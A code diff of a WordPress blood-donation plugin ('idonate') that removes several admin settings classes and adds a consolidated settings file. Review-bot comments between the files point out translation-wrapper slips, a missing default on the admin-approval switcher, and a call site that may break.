-										'title'    => esc_html__('Show/Hide Mobile Number', 'idonate'),
-										'desc'	=> esc_html__('Show/Hide donors mobile number from donor listing.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-										'dependency' 	=> array('restrict_contact_info', '!=', 'hide'),
-									),
-									array(
-										'id'       => 'hide_donor_social_share',
-										'type'     => 'switcher',
-										'class'    => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Social Share', 'idonate'),
-										'desc'	=> esc_html__('Show/Hide donors mobile number from donor listing.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-								),
-							),
-							array(
-								'title'  => __('Text Settings (Pro)', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       	=> 'donor_register_form_title',
-										'type'     	=> 'text',
-										'class'      => 'pro_only_field',
-										'title'    	=> esc_html__('Title for Donor Registration Form', 'idonate'),
-										'desc'	=> esc_html__('The title displayed on the donor registration form.', 'idonate'),
-										'default'	=> esc_html__('Blood Donors Register', 'idonate'),
-									),
-									array(
-										'id'       	=> 'donor_register_form_subtitle',
-										'type'     	=> 'text',
-										'class'      => 'pro_only_field',
-										'title'    	=> esc_html__('Subtitle for Donor Registration Form', 'idonate'),
-										'desc'		=> esc_html__('The subtitle displayed on the donor registration form', 'idonate'),
-										'default'	=> esc_html__('Please fill the following information to register donor.', 'idonate'),
-									),
-
-									array(
-										'id'       => 'donor_lft',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Donor Login Form Title', 'idonate'),
-										'desc'	=> esc_html__('The title displayed on the donor login form.', 'idonate'),
-										'default' => 'Donor Login',
-									),
-									array(
-										'id'       => 'donor_peft',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Donor Profile Edit Form Title', 'idonate'),
-										'desc'	=> esc_html__('The title displayed on the donor profile edit form.', 'idonate'),
-										'default'	=> 'Edit Donors Information',
-									),
-
-								),
-							),
-							array(
-								'title'  => __('Form Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'idonate_countryhide',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide country and state fields', 'idonate'),
-										'desc'		=> esc_html__('Toggle the visibility of country and state fields', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-									array(
-										'id'        => 'donor_form_color',
-										'type'      => 'color_group',
-										'class'      => 'pro_only_field',
-										'title'     => esc_html__('Donor Form Color', 'idonate'),
-										'desc'	=> esc_html__('Set request form text and background color.', 'idonate'),
-										'options'   => array(
-											'background' => esc_html__('Background Color', 'idonate'),
-											'color' => esc_html__('Text Color', 'idonate'),
-										)
-									),
-								),
-							),
-						),
-					),
-				),
-			)
-		);
-	}
-}
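Review bot: The 'default' values for donor_lft ('Donor Login') and donor_peft ('Edit Donors Information') in the removed lines are bare string literals, while every neighbouring default goes through esc_html__() with the 'idonate' text domain. Because this file is deleted rather than edited, check that the consolidated settings file wraps both defaults the same way as its siblings instead of copying the literals across, otherwise these two form titles stay untranslatable.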
--- a/idonate/src/Admin/Settings/IDonateGeneralSettings.php
+++ b/idonate/src/Admin/Settings/IDonateGeneralSettings.php
@@ -1,252 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-use ThemeAtelierIdonateHelpersCountriesCountries;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateGeneralSettings
-{
-
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-
-		$countryOption = Countries::idonate_all_countries();
-
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('GENERAL', 'idonate'),
-				'icon'	=> 'icofont-gear',
-				'fields' => array(
-					array(
-						'id'       => 'idonate_container',
-						'type'     => 'column',
-						'title'    => esc_html__('Container Width', 'idonate'),
-						'desc' => esc_html__('Set plugin pages container maximum width in different devices.', 'idonate'),
-						'default'  => array(
-							'large_desktop'    	=> '1120',
-							'desktop'          	=> '1140',
-							'laptop'          	=> '960',
-							'tablet'           	=> '720',
-							'mobile'           	=> '540',
-						),
-					),
-					array(
-						'id'       => 'idonate_section_padding',
-						'type'     => 'column',
-						'class' => 'pro_only_field',
-						'title'    => esc_html__('Section Padding', 'idonate'),
-						'desc' => esc_html__('Set plugin pages section padding in different devices.', 'idonate'),
-						'default'  => array(
-							'large_desktop'    	=> '80',
-							'desktop'          	=> '80',
-							'laptop'          	=> '60',
-							'tablet'           	=> '50',
-							'mobile'           	=> '40',
-						),
-					),
-					array(
-						'id'        => 'idonate_color_settings',
-						'type'      => 'color_group',
-						'title'     => esc_html__('Color Settings', 'idonate'),
-						'class'		=> 'pro_only_field',
-						'desc'		=> esc_html__('Basic color palette for elements', 'idonate'),
-						'options'   => array(
-							'donor_maincolor' => esc_html__('Main Color', 'idonate'),
-							'donor_bordercolor' => esc_html__('Main Border Color', 'idonate'),
-						)
-					),
-
-					array(
-						'id'       	=> 'idonate_recaptcha_active',
-						'type'     	=> 'switcher',
-						'title'    	=> esc_html__('Activate reCAPTCHA for Forms', 'idonate'),
-						'desc'		=> __('When enabled, reCAPTCHA will be activated on all forms to enhance security and prevent spam submissions.', 'idonate'),
-						'text_on'	=> esc_html__('Enable', 'idonate'),
-						'text_off'	=> esc_html__('Disable', 'idonate'),
-						'text_width'	=> '100',
-					),
-					array(
-						'id' 			=>	'idonate_recapthca_label',
-						'type' 			=>	'text',
-						'title'			=> esc_html__('reCAPTCHA Label', 'idonate'),
-						'desc'			=> esc_html__('Label to display before the reCAPTCHA checkbox.', 'idonate'),
-						'default'		=> esc_html__('Please verify that you are human:', 'idonate'),
-						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true'),
-					),
-					array(
-						'id'       		=> 'idonate_recaptcha_secretkey',
-						'type'     		=> 'text',
-						'title'    		=> esc_html__('reCAPTCHA Secret Key', 'idonate'),
-						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
-						'subtitle'			=> esc_html__('Set your generated recaptcha secret key.', 'idonate'),
-						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true')
-					),
-					array(
-						'id'       => 'idonate_recaptcha_sitekey',
-						'type'     => 'text',
-						'title'    => esc_html__('Recaptcha Site Key', 'idonate'),
-						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
-						'subtitle'		=> esc_html__('Set your generated recaptcha site key.', 'idonate'),
-						'dependency' => array('idonate_recaptcha_active', '==', 'true')
-					),
-					array(
-						'id'       => 'enable_single_country',
-						'type'     => 'switcher',
-						'title'    => esc_html__('Single Country Mode', 'idonate'),
-						'desc'	=> esc_html__('When enabled, the forms will display only the selected country in the country field', 'idonate'),
-						'text_on'	=> esc_html__('Enable', 'idonate'),
-						'text_off'	=> esc_html__('Disable', 'idonate'),
-						'text_width'	=> '100',
-					),
-					array(
-						'id'       => 'idonate_country',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Select Country', 'idonate'),
-						'options' => $countryOption,
-						'dependency' => array('enable_single_country', '==', 'true')
-					),
-
-					array(
-						'id'     => 'donor_social_share',
-						'type'   => 'fieldset',
-						'title'  => esc_html__('Social Share', 'idonate'),
-						'fields' => array(
-							array(
-								'id'       => 'social_sharing_media',
-								'type'     => 'select',
-								'title'    => esc_html__('Sharing Media', 'idonate'),
-								'chosen'   => true,
-								'sortable' => true,
-								'multiple' => true,
-								'placeholder' => esc_html__('Choose an option', 'idonate'),
-								'options'  => array(
-									'facebook' => esc_html__('Facebook', 'idonate'),
-									'twitter' => esc_html__('Twitter', 'idonate'),
-									'linkedIn' => esc_html__('LinkedIn', 'idonate'),
-									'pinterest' => esc_html__('Pinterest', 'idonate'),
-									'email' => esc_html__('Email', 'idonate'),
-									'instagram' => esc_html__('Instagram', 'idonate'),
-									'vk'   => esc_html__('VK', 'idonate'),
-									'digg' => esc_html__('digg', 'idonate'),
-									'tumblr' => esc_html__('Tumblr', 'idonate'),
-									'reddit' => esc_html__('Reddit', 'idonate'),
-									'whatsapp' => esc_html__('WhatsApp', 'idonate'),
-									'xing' => esc_html__('Xing', 'idonate'),
-								),
-							),
-							array(
-								'id'       => 'social_margin',
-								'type'     => 'spacing',
-								'title'    => esc_html__('Margin', 'idonate'),
-								'sanitize' => 'idonate_sanitize_number_array_field',
-								'min'      => -100,
-								'units'    => array('px'),
-								'default'  => array(
-									'top'  => '0',
-									'right' => '0',
-									'bottom' => '0',
-									'left' => '0',
-								),
-							),
-							array(
-								'id'      => 'social_icon_shape',
-								'class'   => 'social_icon_shape',
-								'type'    => 'layout_preset',
-								'title'   => esc_html__('Icon Shape', 'idonate'),
-								'options' => array(
-									'idonate_circle'    => array(
-										'image'       => IDONATE_ASSETS . 'images/circle-icon.png',
-										'text' => esc_html__('Circle', 'idonate'),
-									),
-									'idonate_rounded'   => array(
-										'image'       => IDONATE_ASSETS . 'images/round-icon.png',
-										'text' => esc_html__('Rounded', 'idonate'),
-									),
-									'idonate_square'    => array(
-										'image'       => IDONATE_ASSETS . 'images/square-icon.png',
-										'text' => esc_html__('Square', 'idonate'),
-									),
-									'icon_only' => array(
-										'image'       => IDONATE_ASSETS . 'images/only-icon.png',
-										'text' => esc_html__('Icon only', 'idonate'),
-									),
-								),
-								'default' => 'idonate_circle',
-							),
-							array(
-								'id'      => 'social_icon_custom_color',
-								'type'    => 'checkbox',
-								'title'   => esc_html__('Custom Color', 'idonate'),
-								'default' => false,
-							),
-							array(
-								'id'      => 'social_icon_color',
-								'type'    => 'color_group',
-								'title'   => esc_html__('Icon Color', 'idonate'),
-								'options' => array(
-									'icon_color'       => esc_html__('Icon', 'idonate'),
-									'icon_hover_color' => esc_html__('Icon Hover', 'idonate'),
-									'icon_bg'       => esc_html__('Background', 'idonate'),
-									'icon_bg_hover' => esc_html__('Background Hover', 'idonate'),
-									'icon_border_hover' => esc_html__('Border Hover', 'idonate'),
-								),
-								'default' => array(
-									'icon_color'       => '#ffffff',
-									'icon_hover_color' => '#ffffff',
-									'icon_bg'       => '#ef1414',
-									'icon_bg_hover' => '#ef1414',
-									'icon_border_hover' => '#ef1414',
-								),
-								'dependency' => array('social_icon_custom_color', '==', 'true'),
-							),
-							array(
-								'id'      => 'social_icon_border',
-								'type'    => 'border',
-								'title'   => esc_html__('Icon Border', 'idonate'),
-								'default' => array(
-									'all' => '1',
-									'style' => 'solid',
-									'color' => '#af111c',
-								),
-								'all'     => true,
-								'dependency' => array('social_icon_custom_color', '==', 'true'),
-							),
-						),
-					),
-
-				),
-			)
-		);
-	}
-}
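Review bot: Deleting class IDonateGeneralSettings removes the public static section($prefix) entry point, and nothing in this hunk shows the code that calls it. Any remaining IDonateGeneralSettings::section() call will fatal once the class is gone, so the same change set should show the registration site switching to the replacement class. Note also that the removed lines are settings UI definitions only (container width, reCAPTCHA keys, social share); nothing here touches request handling, so this file removal should be reviewed separately from the authorization fix.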
--- a/idonate/src/Admin/Settings/IDonatePageSettings.php
+++ b/idonate/src/Admin/Settings/IDonatePageSettings.php
@@ -1,145 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonatePageSettings
-{
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('PAGE SETTINGS', 'idonate'),
-				'icon' => 'icofont-file-alt',
-				'fields' => array(
-					array(
-						'id'       	=> 'dashboard_page',
-						'type'     	=> 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    	=> esc_html__('Dashboard Page', 'idonate'),
-						'options' 	=> 'pages',
-						'desc'    	=> esc_html__('Select your dashboard page', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       	=> 'rp_request_page',
-						'type'     	=> 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    	=> esc_html__('Blood Request Listing Page', 'idonate'),
-						'options' 	=> 'pages',
-						'desc'    	=> esc_html__('Select your page to display blood requests. Default page name: Request', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'rf_form_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Blood Request Form Page', 'idonate'),
-						'options' => 'pages',
-						'desc'		=> esc_html('Select your page to display blood request form. Default page name: Blood request', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'donor_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Donor Listing Page', 'idonate'),
-						'options'    => 'pages',
-						'desc'    => esc_html__('Select your page to display donors. Default page name: Donors', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'donor_table_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Donor Table Page', 'idonate'),
-						'options'    => 'pages',
-						'desc'    => esc_html__('Select your page to display donor table. Default page name: Donor Table', 'idonate'),
-						'placeholder' => 'Select an option',
-					),
-					array(
-						'id'       => 'donor_register_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Donor Register Page', 'idonate'),
-						'options'    => 'pages',
-						'desc'    => esc_html__('Select your page to display donor registraion form. Default page name: Donor Register', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'login_redirect',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('After Login Redirect Page', 'idonate'),
-						'desc'    => esc_html__('Select your page to redirect after successful login. Default page name: Home page', 'idonate'),
-						'options'    => 'pages',
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-						'query_args'  => array(
-							'posts_per_page' => -1
-						),
-					),
-					array(
-						'id'       => 'logout_redirectpage',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('After Logout Redirect Page', 'idonate'),
-						'desc'    => esc_html__('Select your page to redirect after successful logout. Default page name: Login page', 'idonate'),
-						'options'    => 'pages',
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-				),
-			)
-		);
-	}
-}
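Review bot: In the rf_form_page field the description is built with esc_html('Select your page to display blood request form. ...', 'idonate'), which passes a text domain to esc_html() where esc_html__() was clearly intended, so that string is escaped but never translated. The donor_table_page placeholder ('Select an option') is likewise a bare literal, and the donor_register_page description misspells "registraion". Since the file is removed wholesale, confirm the replacement definitions fix these three rather than carrying them over verbatim.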
--- a/idonate/src/Admin/Settings/IDonateRequestSettings.php
+++ b/idonate/src/Admin/Settings/IDonateRequestSettings.php
@@ -1,197 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateRequestSettings
-{
-
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('REQUEST SETTINGS', 'idonate'),
-				'icon'	=> 'icofont-blood',
-				'fields' => array(
-					array(
-						'type' => 'tabbed',
-						'tabs' => array(
-							array(
-								'title'  => __('Blood Request Listings Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'donor_request_status',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Require Admin Approval for Blood Requests', 'idonate'),
-										'desc'		=> esc_html__('When enabled, all blood request posts will require your approval before being published to ensure accuracy and appropriateness.', 'idonate'),
-										'text_on'	=> esc_html__('Enable', 'idonate'),
-										'text_off'	=> esc_html__('Disable', 'idonate'),
-										'text_width'	=> '100'
-									),
-									array(
-										'id'       => 'post_request_number_of_columns',
-										'type'     => 'column',
-										'class' => 'pro_only_field',
-										'title'    => esc_html__('Column(s)', 'idonate'),
-										'desc' => esc_html__('Set number of column(s) in different devices for responsive view.', 'idonate'),
-										'default'  => array(
-											'large_desktop'    => '3',
-											'desktop'          => '3',
-											'tablet'           => '2',
-											'mobile'           => '1',
-										),
-										'min'      => '1',
-										'help'       => __('<i class="icofont-monitor"></i> <b> Large Desktop </b> - is larger than 1200px,<br><i class="icofont-laptop"></i> <b>Desktop</b> - size is larger than 992px,<br> <i class="icofont-surface-tablet"></i> <b>Tablet</b> - Size is larger than 768,<br> <i class="icofont-android-tablet"></i> <b> Mobile Landscape </b> - size is larger than 576px.,<br> <i class="icofont-android-tablet"></i> <b> Mobile </b> - size is smaller than 576px.', 'idonate'),
-									),
-
-									array(
-										'id'       	=> 'rp_request_per_page',
-										'type'     	=> 'number',
-										'title'    	=> esc_html__('Blood Request Per Page', 'idonate'),
-										'desc'	=> esc_html__('Set the number of blood requests displayed per page in the blood requests listings.', 'idonate'),
-										'default' 	=> 9,
-									),
-
-									array(
-										'id'       => 'request_view_button',
-										'type'     => 'button_set',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Open Request View Details', 'idonate'),
-										'desc'	=> esc_html__('Choose how the request details should displayed on', 'idonate'),
-										'options' => array(
-											'single_page_link' => esc_html__('On Single Page', 'idonate'),
-											'popup' => esc_html__('On Pop Up', 'idonate'),
-										),
-										'default'	=> 'single_page_link',
-									),
-									array(
-										'id'       	=> 'blood_request_view_slug',
-										'type'     	=> 'text',
-										'title'    	=> esc_html__('Request Single Page Slug', 'idonate'),
-										'default'	=> 'blood-request',
-										'dependency' => array('request_view_button', '==', 'single_page_link'),
-									),
-									array(
-										'id'       => 'request_next_prev',
-										'type'     => 'checkbox',
-										'title'    => esc_html__('Enable Next/Prev', 'idonate'),
-										'desc'	=> esc_html__('Allow navigation between requests using next and previous buttons in the popup view.', 'idonate'),
-										'dependency' => array('request_view_button', '==', 'popup')
-									),
-									array(
-										'id'       => 'auto_delete_expired_requests',
-										'type'     => 'select',
-										'title'    => esc_html__('Auto-Delete Expired Blood Requests', 'idonate'),
-										'desc'	=> esc_html__('Automatically remove blood requests that are no longer needed. ', 'idonate'),
-										'options' => array(
-											'never_delete' => esc_html__('Never Delete', 'idonate'),
-											'current_date' => esc_html__('Delete on Blood Needed Date', 'idonate'),
-											'one_week' => esc_html__('Delete One Week After Blood Needed Date', 'idonate'),
-											'two_week' => esc_html__('Delete Two Weeks After Blood Needed Date (Pro)', 'idonate'),
-											'one_month' => esc_html__('Delete One Month After Blood Needed Date (Pro)', 'idonate'),
-										),
-										'default' => 'one_week',
-									),
-								),
-							),
-							array(
-								'title'  => __('Text Settings (Pro)', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'rf_form_title',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Blood Request Form Title', 'idonate'),
-										'desc'		=> esc_html__('The title displayed on the request form.', 'idonate'),
-										'default'	=> esc_html__('Submit Your Request', 'idonate'),
-									),
-									array(
-										'id'       => 'rf_sub_title',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Blood Request Form Sub Title', 'idonate'),
-										'desc'		=> esc_html__('The subtitle displayed on the request form.', 'idonate'),
-										'default'	=> esc_html__('Please fill the following information to post your blood request.', 'idonate'),
-									),
-									array(
-										'id'       => 'rf_btn_label',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Submit Button Label for Request Form', 'idonate'),
-										'desc'	=> esc_html__('The label text displayed on the submit button of the request form.', 'idonate'),
-										'default'	=> esc_html__('Blood Request', 'idonate'),
-									),
-								),
-							),
-							array(
-								'title'  => __('Form Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'idonate_bloodrequestcountryhide',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Country and State Fields On the Request Form', 'idonate'),
-										'desc'	=> esc_html__('Toggle the visibility of country and state fields', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-									array(
-										'id'       => 'rf_form_img_upload',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Image Upload Field On the Request Form', 'idonate'),
-										'desc'	=> esc_html__('Toggle the visibility of image upload field', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> false,
-									),
-									array(
-										'id'       => 'request_form_color',
-										'type'     => 'color_group',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Request Form Color', 'idonate'),
-										'desc'	=> esc_html__('Set request form text and background color.', 'idonate'),
-										'options'   => array(
-											'background' => esc_html__('Background Color', 'idonate'),
-											'color' => esc_html__('Text Color', 'idonate'),
-										),
-									),
-								),
-							),
-						),
-					),
-				),
-			)
-		);
-	}
-}
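Review bot: The donor_request_status switcher ("Require Admin Approval for Blood Requests") has no 'default' key, unlike the other switchers in this file such as idonate_bloodrequestcountryhide and rf_form_img_upload, which set one explicitly. This option decides whether user-submitted requests publish without moderation, so when it is moved into the consolidated settings file it should carry an explicit 'default' => true rather than relying on whatever the framework returns for an unset switcher. Separately, the 'help' string on post_request_number_of_columns passes raw HTML through __() without wp_kses(), which is worth tightening during the move.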
--- a/idonate/src/Admin/Settings/IDonateSettings.php
+++ b/idonate/src/Admin/Settings/IDonateSettings.php
@@ -0,0 +1,827 @@
+<?php
+
+/**
+ * Custom CSS settings tab.
+ *
+ * @since      1.0.0
+ *
+ * @package idonate
+ * @subpackage idonate/Admin/Settings
+ * @author     ThemeAtelier<themeatelierbd@gmail.com>
+ */
+
+namespace ThemeAtelierIdonateAdminSettings;
+
+use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
+use ThemeAtelierIdonateHelpersCountriesCountries;
+// Cannot access directly.
+if (!defined('ABSPATH')) {
+	die;
+}
+
+/**
+ * This class is responsible for Custom CSS settings tab in settings page.
+ *
+ * @since      1.0.0
+ */
+class IDonateSettings
+{
+
+	/**
+	 * Custom CSS settings.
+	 *
+	 * @since 1.0.0
+	 * @param string $prefix idonate_organizers_settings.
+	 */
+	public static function section($prefix)
+	{
+
+		$countryOption = Countries::idonate_all_countries();
+
+		IDONATE::createSection(
+			$prefix,
+			array(
+				'title'  => esc_html__('GENERAL', 'idonate'),
+				'icon'	=> 'icofont-gear',
+				'fields' => array(
+					array(
+						'id'       => 'idonate_container',
+						'type'     => 'column',
+						'title'    => esc_html__('Container Width', 'idonate'),
+						'desc' => esc_html__('Set plugin pages container maximum width in different devices.', 'idonate'),
+						'default'  => array(
+							'large_desktop'    	=> '1120',
+							'desktop'          	=> '1140',
+							'laptop'          	=> '960',
+							'tablet'           	=> '720',
+							'mobile'           	=> '540',
+						),
+					),
+					array(
+						'id'       => 'idonate_section_padding',
+						'type'     => 'column',
+						'class' => 'pro_only_field',
+						'title'    => esc_html__('Section Padding', 'idonate'),
+						'desc' => esc_html__('Set plugin pages section padding in different devices.', 'idonate'),
+						'default'  => array(
+							'large_desktop'    	=> '80',
+							'desktop'          	=> '80',
+							'laptop'          	=> '60',
+							'tablet'           	=> '50',
+							'mobile'           	=> '40',
+						),
+					),
+					array(
+						'id'        => 'idonate_color_settings',
+						'type'      => 'color_group',
+						'title'     => esc_html__('Color Settings', 'idonat-pro'),
+						'class'		=> 'pro_only_field',
+						'desc'		=> esc_html__('Basic color palette for elements', 'idoante-pro'),
+						'options'   => array(
+							'donor_maincolor' => esc_html__('Main Color', 'idonate'),
+							'donor_bordercolor' => esc_html__('Main Border Color', 'idonate'),
+						)
+					),
+
+					array(
+						'id'       	=> 'idonate_recaptcha_active',
+						'type'     	=> 'switcher',
+						'title'    	=> esc_html__('Activate reCAPTCHA for Forms', 'idonate'),
+						'desc'		=> __('When enabled, reCAPTCHA will be activated on all forms to enhance security and prevent spam submissions.', 'idonate'),
+						'text_on'	=> esc_html__('Enable', 'idonate'),
+						'text_off'	=> esc_html__('Disable', 'idonate'),
+						'text_width'	=> '100',
+					),
+					array(
+						'id' 			=>	'idonate_recapthca_label',
+						'type' 			=>	'text',
+						'title'			=> esc_html__('reCAPTCHA Label', 'idoante-pro'),
+						'desc'			=> esc_html__('Label to display before the reCAPTCHA checkbox.', 'idoante-pro'),
+						'default'		=> esc_html__('Please verify that you are human:', 'idoante-pro'),
+						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true'),
+					),
+					array(
+						'id'       		=> 'idonate_recaptcha_secretkey',
+						'type'     		=> 'text',
+						'title'    		=> esc_html__('reCAPTCHA Secret Key', 'idonate'),
+						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
+						'subtitle'			=> esc_html__('Set your generated recaptcha secret key.', 'idonate'),
+						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true')
+					),
+					array(
+						'id'       => 'idonate_recaptcha_sitekey',
+						'type'     => 'text',
+						'title'    => esc_html__('Recaptcha Site Key', 'idonate'),
+						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
+						'subtitle'		=> esc_html__('Set your generated recaptcha site key.', 'idonate'),
+						'dependency' => array('idonate_recaptcha_active', '==', 'true')
+					),
+					array(
+						'id'       => 'enable_single_country',
+						'type'     => 'switcher',
+						'title'    => esc_html__('Single Country Mode', 'idonate'),
+						'desc'	=> esc_html__('When enabled, the forms will display only the selected country in the country field', 'idonate'),
+						'text_on'	=> esc_html__('Enable', 'idonate'),
+						'text_off'	=> esc_html__('Disable', 'idonate'),
+						'text_width'	=> '100',
+					),
+					array(
+						'id'       => 'idonate_country',
+						'type'     => 'select',
+						'chosen'      => true,
+						'settings'	=> array(
+							'width'		=> '227px',
+						),
+						'title'    => esc_html__('Select Country', 'idonate'),
+						'options' => $countryOption,
+						'dependency' => array('enable_single_country', '==', 'true')
+					),
+
+					array(
+						'id'     => 'donor_social_share',
+						'type'   => 'fieldset',
+						'title'  => esc_html__('Social Share', 'idonate'),
+						'fields' => array(
+							array(
+								'id'       => 'social_sharing_media',
+								'type'     => 'select',
+								'title'    => esc_html__('Sharing Media', 'idonate'),
+								'chosen'   => true,
+								'sortable' => true,
+								'multiple' => true,
+								'placeholder' => esc_html__('Choose an option', 'idonate'),
+								'options'  => array(
+									'facebook' => esc_html__('Facebook', 'idonate'),
+									'twitter' => esc_html__('Twitter', 'idonate'),
+									'linkedIn' => esc_html__('LinkedIn', 'idonate'),
+									'pinterest' => esc_html__('Pinterest', 'idonate'),
+									'email' => esc_html__('Email', 'idonate'),
+									'instagram' => esc_html__('Instagram', 'idonate'),
+									'vk'   => esc_html__('VK', 'idonate'),
+									'digg' => esc_html__('digg', 'idonate'),
+									'tumblr' => esc_html__('Tumblr', 'idonate'),
+									'reddit' => esc_html__('Reddit', 'idonate'),
+									'whatsapp' => esc_html__('WhatsApp', 'idonate'),
+									'xing' => esc_html__('Xing', 'idonate'),
+								),
+							),
+							array(
+								'id'       => 'social_margin',
+								'type'     => 'spacing',
+								'title'    => esc_html__('Margin', 'idonate'),
+								'sanitize' => 'idonate_sanitize_number_array_field',
+								'min'      => -100,
+								'units'    => array('px'),
+								'default'  => array(
+									'top'  => '0',
+									'right' => '0',
+									'bottom' => '0',
+									'left' => '0',
+								),
+							),
+							array(
+								'id'      => 'social_icon_shape',
+								'class'   => 'social_icon_shape',
+								'type'    => 'layout_preset',
